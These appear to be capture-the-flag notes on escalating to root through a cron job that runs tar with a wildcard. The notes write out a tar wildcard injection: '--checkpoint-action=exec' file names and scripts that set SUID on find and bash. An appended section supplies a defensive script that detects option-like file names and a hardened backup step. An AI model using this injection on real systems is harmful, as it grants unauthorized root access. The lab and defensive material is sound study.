Priv Escalation
Cron job running as root; see if we can modify it, otherwise try mysql running on internal
Tar Wildcard Injection


The script changes to /var/www/html, a directory we have write access to.
alice@readys:/var/www/html$ echo "" > "--checkpoint-action=exec=sh demo.sh"
alice@readys:/var/www/html$ echo "" > --checkpoint=1
alice@readys:/var/www/html$ echo "chmod u+s /usr/bin/find" > test.sh
alice@readys:/var/www/html$ echo "" > "--checkpoint-action=exec=sh test.sh"
alice@readys:/var/www/html$ echo "" > --checkpoint=1
alice@readys:/var/www/html$ echo "chmod +s /bin/bash" > exploit.sh
alice@readys:/var/www/html$ touch ./"--checkpoint=1"
alice@readys:/var/www/html$ touch ./"--checkpoint-action=exec=bash exploit.sh"
This is the way I did it.
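Defender's side of the same issue, as an added example that is not part of the original notes or the box's cron script: it assumes the root job archives /var/www/html with a bare `*`, and shows a check for option-like file names plus a backup step that never hands file names to tar as arguments. The function names are hypothetical.

```shell
#!/bin/sh
# Added defensive example; function names are hypothetical.
# Assumption: the root cron job runs something like `cd DIR && tar ... *`.
# A bare `*` expands every file name into tar's argument list, so a name
# beginning with "-" is parsed by tar as an option instead of a member.

# Print entries directly inside DIR whose names begin with "-".
find_option_like_names() {
    find "$1" -mindepth 1 -maxdepth 1 -name '-*' -print
}

# Count those entries (one marker line per match, so names that contain
# newlines cannot inflate the count).
count_option_like_names() {
    find "$1" -mindepth 1 -maxdepth 1 -name '-*' -exec printf 'x\n' \; \
        | wc -l | tr -d ' '
}

# Hardened backup step: no glob at all. tar is pointed at the directory
# with -C and told to archive ".", so every member is stored as "./name"
# and no file name ever reaches tar's option parser.
# (If a glob must be kept, `./*` instead of `*` has the same effect.)
safe_backup() {
    src=$1
    out=$2
    tar -czf "$out" -C "$src" .
}

# Audit helper for a cron wrapper: refuse to run and report when
# option-like names are present in a directory others can write to.
audit_then_backup() {
    src=$1
    out=$2
    n=$(count_option_like_names "$src")
    if [ "$n" -gt 0 ]; then
        echo "refusing backup: $n option-like name(s) in $src" >&2
        find_option_like_names "$src" >&2
        return 1
    fi
    safe_backup "$src" "$out"
}
```

`safe_backup` is the actual fix; `audit_then_backup` additionally turns planted names into a logged failure that can be alerted on.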